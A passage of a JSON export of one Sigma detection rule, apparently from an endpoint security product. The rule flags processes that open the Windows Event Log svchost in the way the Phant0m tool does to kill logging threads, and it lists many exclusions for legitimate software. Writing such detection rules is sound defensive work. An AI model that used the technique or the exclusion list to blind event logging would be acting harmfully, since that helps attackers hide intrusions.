"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071950Z",
"creation_date": "2026-03-23T11:45:34.071953Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071963Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/hlldz/Phant0m/",
"https://artofpwn.com/2017/06/05/phant0m-killing-windows-event-log.html",
"https://www.ired.team/offensive-security/defense-evasion/disabling-windows-event-logs-by-suspending-eventlog",
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_windows_eventlog_thread_killer.yml",
"content": "title: Windows Event Log Svchost Process Suspiciously Accessed\nid: 368a9015-91da-4e88-9611-4dd3cf5e001c\ndescription: |\n Detects an attempt to open an svchost process in a similar way as Phant0m to kill or suspend the threads of the Windows Event Log service.\n Attackers may try to tamper with the Event Log service to prevent it from reporting malicious activities to logging or EDR solutions.\n It is recommended to investigate the process accessing the Event Log to look for malicious content or actions and to investigate any subsequent suspicious activities on the host.\nreferences:\n - https://github.com/hlldz/Phant0m/\n - https://artofpwn.com/2017/06/05/phant0m-killing-windows-event-log.html\n - https://www.ired.team/offensive-security/defense-evasion/disabling-windows-event-logs-by-suspending-eventlog\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/06/21\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection_base:\n TargetImage|endswith: '\\svchost.exe'\n TargetProcessUser: 'NT AUTHORITY\\LOCAL SERVICE'\n TargetProcessCommandLine|contains|all:\n - 'svchost.exe -k LocalServiceNetworkRestricted'\n - 'EventLog'\n\n selection_variant_phant0m_v1:\n # https://github.com/hlldz/Phant0m/blob/595360122763137aea3a0f5736c28e0d931e8c6d/old/Invoke-Phant0m.ps1#L1018\n GrantedAccess: '0x1f3fff'\n CallTrace:\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\KernelBase.dll+?????|UNKNOWN(????????????????)'\n - '\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\ntdll.dll+?????|\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\KernelBase.dll+?????|UNKNOWN(????????????????)'\n\n selection_variant_generic:\n # https://www.ired.team/offensive-security/defense-evasion/disabling-windows-event-logs-by-suspending-eventlog-service-threads#code\n GrantedAccess: '0x1fffff'\n CallTrace|contains: 'UNKNOWN'\n #CallTrace:\n # - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\KernelBase.dll+?????|*|?:\\Windows\\System32\\kernel32.dll+?????|C:\\Windows\\System32\\ntdll.dll+?????'\n # - '\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\ntdll.dll+?????|\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\KernelBase.dll+?????|*|\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\kernel32.dll+?????|\\Device\\vmsmb\\VSMB-{????????-????-????-????-????????????}\\os\\Windows\\System32\\ntdll.dll+?????'\n\n selection_variant_phant0m_v2_no_name:\n # https://github.com/hlldz/Phant0m/blob/89d722204c6e2f8b1b17da0a9b20b1e98ca3f576/phant0m/include/technique_1.h#L81\n GrantedAccess: '0x10'\n ProcessOriginalFileName: ''\n ProcessInternalName: ''\n\n selection_variant_phant0m_v2_unknown_module:\n # https://github.com/hlldz/Phant0m/blob/89d722204c6e2f8b1b17da0a9b20b1e98ca3f576/phant0m/include/technique_1.h#L81\n GrantedAccess: '0x10'\n CallTrace|contains: 'UNKNOWN'\n\n exclusion_hook:\n CallTrace: '*Windows\\SysWOW64\\ntdll.dll+?????|UNKNOWN(00000000????????)|?:\\\\*?:\\Windows\\SysWOW64\\kernel32.dll+*|?:\\Windows\\SysWOW64\\ntdll.dll+*'\n\n exclusion_net:\n # False positive with Microsoft .NET\n # Example PowerShell Get-Process cmdlet :\n # C:\\Windows\\System32\\ntdll.dll+9d234|C:\\Windows\\System32\\KernelBase.dll+2c0fe|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\43b97e99fab55055761ec7618b2bf77b\\System.ni.dll+381e70|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\43b97e99fab55055761ec7618b2bf77b\\System.ni.dll+2fa12e|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\43b97e99fab55055761ec7618b2bf77b\\System.ni.dll+2f8cd5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\43b97e99fab55055761ec7618b2bf77b\\System.ni.dll+2c3b1e|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\43b97e99fab55055761ec7618b2bf77b\\System.ni.dll+2c01f5|UNKNOWN(00007ffc4002cc2a)\n CallTrace:\n - '*\\System.ni.dll+*\\System.ni.dll+*\\System.ni.dll+????UNKNOWN(????????????????)'\n - '*\\System.ni.dll+*\\System.ni.dll+*\\System.ni.dll+?????UNKNOWN(????????????????)'\n - '*\\System.ni.dll+*\\System.ni.dll+*\\System.ni.dll+??????UNKNOWN(????????????????)'\n - '*\\System.ni.dll+*\\System.ni.dll+*\\System.ni.dll+???????UNKNOWN(????????????????)'\n\n exclusion_tmmon_trendmicro_1:\n # ...C:\\Windows\\SysWOW64\\ntdll.dll+51843|C:\\Windows\\SysWOW64\\ntdll.dll+519b1|C:\\Windows\\SysWOW64\\ntdll.dll+52255|C:\\Windows\\SysWOW64\\ntdll.dll+4e272|C:\\Windows\\SysWOW64\\ntdll.dll+4deb6|C:\\Windows\\SysWOW64\\tmumh\\20019\\TmMon\\2.9.0.1036\\tmmon.dll+62c39|UNKNOWN(00000000036d05b2)|C:\\Windows\\SysWOW64\\KernelBase.dll+110766\n # ...|C:\\Windows\\SysWOW64\\ntdll.dll+72c3c|C:\\Windows\\SysWOW64\\tmumh\\20019\\TmMon\\2.9.0.1027\\tmmon.dll+6d519|UNKNOWN(000000000092027c)|C:\\Windows\\SysWOW64\\KernelBase.dll+10ffd8|....\n CallTrace|contains: '?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\tmumh\\\\*\\TmMon\\\\*\\tmmon.dll+?????|UNKNOWN(000000??????????)|?:\\Windows\\SysWOW64\\KernelBase.dll+??????'\n\n exclusion_tmmon_trendmicro_2:\n # C:\\Windows\\System32\\ntdll.dll+a6144|C:\\Windows\\System32\\tmumh\\20019\\TmMon\\2.9.0.1041\\tmmon64.dll+20af8|UNKNOWN(0000022eb3212040)\n # C:\\Windows\\System32\\ntdll.dll+9044a|C:\\Windows\\System32\\tmumh\\20019\\TmMon\\2.9.0.1049\\tmmon64.dll.1092904734+20af8|UNKNOWN(000000186d2da040)\n CallTrace:\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\tmumh\\\\*\\TmMon\\\\*\\tmmon64.dll+?????|UNKNOWN(000?????????????)'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\tmumh\\\\*\\TmMon\\\\*\\tmmon64.dll.*+?????|UNKNOWN(000?????????????)'\n\n exclusion_bitdefender_dll:\n # C:\\Windows\\System32\\ntdll.dll+9d204|C:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_265967468665702422\\atcuf64.dll+65cb7|C:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_265967468665702422\\atcuf64.dll+8df8|UNKNOWN(000002b741f510c7)\n # too many different grantedaccess, don't use it...\n # GrantedAccess:\n # - '0x1010'\n # - '0x1410'\n # - '0x1411'\n # - '0x101410'\n # - '0x1f3fff'\n CallTrace|endswith:\n - '|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_??????????????????\\atcuf64.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_??????????????????\\atcuf64.dll+????|UNKNOWN(00000???????????)'\n - '|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\\\??????????????????\\atcuf64.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\\\??????????????????\\atcuf64.dll+????|UNKNOWN(00000???????????)'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\dlls_??????????????????\\atcuf64.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\dlls_??????????????????\\atcuf64.dll+????|UNKNOWN(00000???????????)'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\\\??????????????????\\atcuf64.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\\\??????????????????\\atcuf64.dll+????|UNKNOWN(00000???????????)'\n\n exclusion_bitdefender_dll_32bits:\n CallTrace|contains:\n - '|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_??????????????????\\atcuf32.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\dlls_??????????????????\\atcuf32.dll+????|UNKNOWN(00000???????????)|?:\\'\n - '|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\\\??????????????????\\atcuf32.dll+?????|?:\\Program Files\\Bitdefender\\Endpoint Security\\atcuf\\\\??????????????????\\atcuf32.dll+????|UNKNOWN(00000???????????)|?:\\'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\dlls_??????????????????\\atcuf32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\dlls_??????????????????\\atcuf32.dll+????|UNKNOWN(00000???????????)|?:\\'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\\\??????????????????\\atcuf32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\atcuf\\\\??????????????????\\atcuf32.dll+????|UNKNOWN(00000???????????)|?:\\'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm32.dll+?????|UNKNOWN(00000???????????)|?:\\'\n - '|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(00000???????????)|?:\\'\n\n exclusion_malwarebytes_service:\n ProcessProcessName: 'MBAMService.exe'\n ProcessInternalName: 'MBAMService.exe'\n ProcessOriginalFileName: 'MBAMService.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Malwarebytes Inc'\n - 'Malwarebytes Inc.'\n\n exclusion_connectifyd:\n ProcessProcessName: 'Connectifyd.exe'\n ProcessInternalName: 'Connectifyd.exe'\n ProcessOriginalFileName: 'Connectifyd.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Connectify (Connectify, Inc.)'\n\n exclusion_ms_sensor:\n ProcessProcessName: 'SensorLogonTask.exe'\n ProcessInternalName: 'SensorLogonTask.exe'\n ProcessOriginalFileName: 'SensorLogonTask.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_ms_sql_server_installer:\n CallTrace|contains: 'sqlprocesssub.dll'\n ProcessInternalName: 'Microsoft.SqlServer.Chainer.Setup'\n ProcessOriginalFileName: 'Microsoft.SqlServer.Chainer.Setup.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_symantec_service_framework1:\n ProcessProcessName: 'ccSvcHst.exe'\n ProcessOriginalFileName: 'ccSvcHst.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n GrantedAccess: '0x1fffff'\n\n exclusion_symantec_service_framework2:\n ProcessImage: '?:\\Windows\\System32\\cscript.exe'\n ProcessParentImage: '?:\\Program Files\\Symantec\\Symantec Endpoint Protection\\\\*\\Bin64\\ccSvcHst.exe'\n\n exclusion_bitdefender_service:\n CallTrace|contains|all:\n - 'Bitdefender Security'\n - 'atcuf64.dll'\n ProcessProcessName: 'svchost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_avira_setup:\n CallTrace|contains|all:\n - 'Avira'\n - 'systemutilities.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Avira Operations GmbH ? Co. KG'\n\n exclusion_cylance:\n ProcessSigned: 'true'\n ProcessSignature: 'Cylance, Inc.'\n\n exclusion_windows_defender:\n CallTrace|contains|all:\n - '?:\\Program Files\\Windows Defender\\MpSvc.dll'\n - '?:\\Program Files\\Windows Defender\\MpClient.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_dell:\n CallTrace|contains|all:\n - '\\Dell\\SupportAssistAgent\\'\n - 'Reaver.dll'\n ProcessProcessName: 'Dsapi.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'PC-Doctor, Inc.'\n\n exclusion_wmi_win32_process_list:\n CallTrace|contains:\n - '?:\\Windows\\SYSWOW64\\wbem\\WmiPerfClass.dll'\n - '?:\\Windows\\System32\\wbem\\WmiPerfClass.dll'\n ProcessProcessName: 'WmiPrvSE.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_wmi_perfproc:\n CallTrace|contains|all:\n - '\\perfproc.dll'\n - '\\pdh.dll'\n ProcessProcessName: 'WmiPrvSE.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_msiexec_perfproc:\n CallTrace|contains|all:\n - '\\perfproc.dll'\n - '\\msi.dll'\n ProcessProcessName: 'msiexec.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_sqlserver:\n ProcessProcessName: 'scenarioengine.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_mpengine_dll:\n # C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{4D3EBD53-6213-4DF5-93EE-076A6A0589B1}\\mpengine.dll+1b3845\n CallTrace|contains:\n - 'Definition Updates\\{????????-????-????-????-????????????}\\mpengine.dll'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MpSvc.dll'\n #ProcessProcessName:\n # - 'MsMpEng.exe'\n # # Windows 7 with Windows Defender\n # - 'svchost.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n # Windows 7 with Windows Defender\n - 'Microsoft Windows'\n GrantedAccess: '0x1FFFFF'\n\n exclusion_msmpeng:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n # Windows 7 with Windows Defender\n - 'Microsoft Windows'\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n\n exclusion_optimize_it_service_host:\n ProcessProcessName: 'ServiceHost.exe'\n ProcessImage:\n - '?:\\Program Files (x86)\\OptimizeIT\\CollectIT Service\\ServiceHost.exe'\n - '?:\\Program Files\\OptimizeIT\\CollectIT Service\\ServiceHost.exe'\n GrantedAccess: '0x1f3fff'\n\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfetp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe' # C:\\Program Files\\McAfee\\Endpoint Security\\Firewall\\mfefw.exe\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'McAfee, LLC'\n - 'MUSARUBRA US LLC' # new signer name for mcafee/trellix it seems\n\n exclusion_kaspersky1:\n ProcessProcessName:\n - 'avp.exe'\n - 'Antivirus.OutprocScanner.exe'\n - 'kavfswp.exe' # ?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Windows Server\\kavfswp.exe\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Kaspersky Lab'\n - 'Kaspersky Lab JSC'\n exclusion_kaspersky2:\n ProcessOriginalFileName: 'Kaspersky Virus Removal Tool.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'AO Kaspersky Lab'\n\n exclusion_battleeye:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\BattlEye\\BEService.exe'\n\n exclusion_kited:\n ProcessImage: '?:\\Program Files\\Kite\\kited.exe'\n\n exclusion_trendmicro:\n ProcessProcessName:\n - 'TmCCSF.exe'\n # C:\\Program Files (x86)\\Trend Micro\\Security Agent\\Ntrtscan.exe\n - 'Ntrtscan.exe'\n - 'coreServiceShell.exe' # C:\\Program Files\\Trend Micro\\AMSP\\coreServiceShell.exe\n - 'TMBMSRV.exe' # C:\\Program Files (x86)\\Trend Micro\\BM\\TMBMSRV.exe\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_csrss:\n ProcessProcessName: 'csrss.exe'\n ProcessImage: '?:\\Windows\\System32\\csrss.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n ProcessIntegrityLevel: 'System'\n # %SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16\n ProcessCommandLine|contains: '%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection='\n\n exclusion_norton:\n ProcessProcessName: 'NortonSecurity.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NortonLifeLock Inc.'\n\n exclusion_rpc:\n ProcessProcessName: 'services.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n CallTrace|contains: '?:\\Windows\\System32\\rpcrt4.dll'\n GrantedAccess: '0x1FFFFF'\n\n exclusion_easeus:\n ProcessProcessName: 'Agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'CHENGDU YIWO Tech Development Co., Ltd.'\n CallTrace|contains: '?:\\Program Files (x86)\\EaseUS\\Todo Backup\\bin\\CmdManager.dll'\n\n exclusion_exchange:\n ProcessProcessName: 'ExSetupUI.exe'\n ProcessInternalName: 'ExSetupUI.exe'\n ProcessOriginalFileName: 'ExSetupUI.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_wmiprvse:\n ProcessImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n ProcessParentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch'\n - '?:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p'\n GrantedAccess:\n - '0x1f3fff'\n - '0x1f1fff'\n CallTrace:\n - '?:\\Windows\\System32\\ntdll.dll+????|?:\\Windows\\System32\\KernelBase.dll+????|UNKNOWN(0000????????????)'\n - '?:\\Windows\\System32\\ntdll.dll+????|?:\\Windows\\System32\\KernelBase.dll+?????|UNKNOWN(0000????????????)'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\KernelBase.dll+????|UNKNOWN(0000????????????)'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\KernelBase.dll+?????|UNKNOWN(0000????????????)'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\KernelBase.dll+????|UNKNOWN(0000????????????)|UNKNOWN(0000????????????)|*?:\\Windows\\Microsoft.NET\\Framework\\\\*\\clr.dll*'\n\n exclusion_realtek:\n ProcessImage:\n - '?:\\Windows\\System32\\RtkAudUService64.exe'\n - '?:\\Windows\\System32\\DriverStore\\FileRepository\\\\*\\RtkAudUService64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Realtek Semiconductor Corp.'\n\n exclusion_examshield:\n ProcessImage|endswith: '\\AppData\\Roaming\\Peoplecert\\ExamShield\\ExamShield.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'PEOPLECERT INTERNATIONAL LTD'\n\n exclusion_examshield_parent:\n ProcessProcessName: 'ExamShield.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'PEOPLECERT INTERNATIONAL LTD'\n\n exclusion_nable:\n ProcessImage: '?:\\ProgramData\\GetSupportService_N-Central\\Updates\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'N-ABLE TECHNOLOGIES LTD'\n\n exclusion_panda:\n ProcessOriginalFileName: 'PSANHost.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Panda Security S.L.'\n - 'Panda Security, S.L.'\n\n exclusion_lenovo:\n ProcessProcessName:\n - 'LenovoVantage-(SmartPerformanceAddin).exe'\n # C:\\windows\\System32\\DriverStore\\FileRepository\\fn.inf_amd64_b35e68dd5c21bba8\\driver\\TPHKLOAD.exe\n - 'tphkload.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Lenovo'\n\n exclusion_ivanti:\n CallTrace|contains:\n - 'Program Files\\Ivanti\\Endpoint\\atcuf\\\\*\\atcuf64.dll'\n - 'Program Files\\Ivanti\\Endpoint\\bdhkm32.dll'\n ProcessProcessName:\n - 'WmiPrvSE.exe'\n - 'tphkload.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Lenovo'\n\n exclusion_bitdefender_injection_64:\n CallTrace|startswith:\n # \\Bitdefender\\Endpoint Security\\ and \\Bitdefender\\Bitdefender Security\\\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(00007???????????)|?:\\Windows\\System32\\KernelBase.dll+'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(00007???????????)|?:\\Windows\\System32\\ntdll.dll+'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(00007???????????)|?:\\Windows\\System32\\KernelBase.dll+'\n - '?:\\Windows\\System32\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm64.dll+?????|UNKNOWN(00007???????????)|?:\\Windows\\System32\\ntdll.dll+'\n exclusion_bitdefender_injection_32:\n CallTrace|contains:\n # \\Bitdefender\\Endpoint Security\\ and \\Bitdefender\\Bitdefender Security\\\n - '|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Bitdefender\\\\* Security\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(00000000????????)|'\n - '|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\System32\\ntdll.dll+?????|?:\\Windows\\SysWOW64\\ntdll.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|?:\\Program Files\\Ivanti\\Endpoint\\bdhkm\\dlls_??????????????????\\bdhkm32.dll+?????|UNKNOWN(00000000????????)|'\n\n exclusion_zenworks:\n ProcessImage: '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\ZenNotifyIcon.exe'\n\n exclusion_dict:\n ProcessImage: '?:\\Program Files (x86)\\DicT\\Fichiers Communs\\DicT.exe'\n\n exclusion_tasklist_module:\n ProcessImage:\n - '?:\\Windows\\System32\\tasklist.exe'\n - '?:\\Windows\\Syswow64\\tasklist.exe'\n # C:\\Windows\\system32\\tasklist.exe /M LenovoBatteryGaugePackage.dll\n ProcessCommandLine: '*tasklist* /M *.dll'\n GrantedAccess: '0x1fffff'\n\n exclusion_java:\n ProcessImage: '*\\runtime\\jre\\bin\\java.exe'\n CallTrace|contains: 'runtime\\jre\\bin\\client\\jvm.dll'\n\n exclusion_topaz_ofd:\n ProcessImage: '?:\\Program Files\\Topaz OFD\\Warsaw\\core.exe'\n\n exclusion_superantispyware:\n ProcessOriginalFileName: 'SUPERAntiSpyware.exe'\n\n exclusion_razer:\n ProcessImage: '?:\\Program Files (x86)\\Razer\\Razer Cortex\\RazerCortex.exe'\n\n exclusion_dnspy:\n ProcessImage: '*\\dnSpy.exe'\n ProcessInternalName: 'dnSpy.dll'\n ProcessOriginalFileName: 'dnSpy.dll'\n\n exclusion_controlup_signed:\n ProcessImage: '*\\cuAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ControlUp, Inc.'\n exclusion_controlup_unsigned:\n ProcessImage: '?:\\Program Files\\Smart-X\\ControlUpAgent\\Version *\\cuAgent.exe'\n ProcessOriginalFileName: 'cuAgent.exe'\n\n exclusion_hpdia:\n ProcessImage|endswith: '\\HPDIA.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'HP Inc.'\n\n exclusion_archestra:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\ArchestrA\\Install\\{????????-????-????-????-????????????}\\FormLoader.exe'\n - '?:\\Program Files (x86)\\Common Files\\ArchestrA\\Install\\{????????-????-????-????-????????????}\\FormLoader.exe'\n\n exclusion_coraactivite:\n ProcessImage: '?:\\Program Files (x86)\\CORA\\\\*\\CoRa Activite\\CORA_Activite.exe'\n ProcessCompany: 'Maincare Solutions'\n\n exclusion_mediqual:\n ProcessImage:\n - '?:\\Program Files\\Mediqual7\\MediFrameWork.exe'\n - '?:\\Program Files (x86)\\Mediqual7\\MediFrameWork.exe'\n ProcessOriginalFileName: 'MediFrameWork.exe'\n\n exclusion_veeam:\n ProcessOriginalFileName: 'Veeam.Setup.Wizard.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Veeam Software Group GmbH'\n\n exclusion_adguard:\n ProcessOriginalFileName: 'AdguardSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Adguard Software Limited'\n\n exclusion_lenovo_2:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\Lenovo\\Lenovo Service Bridge\\LSB.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Lenovo (Beijing) Limited'\n\n exclusion_teams:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n\n exclusion_inuit:\n ProcessImage:\n - '?:\\Program Files\\Intuit\\QuickBooks Desktop File Doctor\\QBFDT.exe'\n - '?:\\Program Files (x86)\\Intuit\\QuickBooks Desktop File Doctor\\QBFDT.exe'\n\n exclusion_imagine_editions:\n ProcessImage:\n - '?:\\program files\\imagine editions\\hdupdate\\hdupdate.exe'\n - '?:\\program files (x86)\\imagine editions\\hdupdate\\hdupdate.exe'\n\n exclusion_werfault1:\n ProcessImage:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\syswow64\\WerFault.exe'\n exclusion_werfault2:\n ProcessCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k WerSvcGroup'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_siemens:\n ProcessImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n ProcessGrandparentImage: '?:\\Program Files\\Siemens\\syngo\\bin\\syngo.Common.Starter.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n condition: selection_base and 1 of selection_variant_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
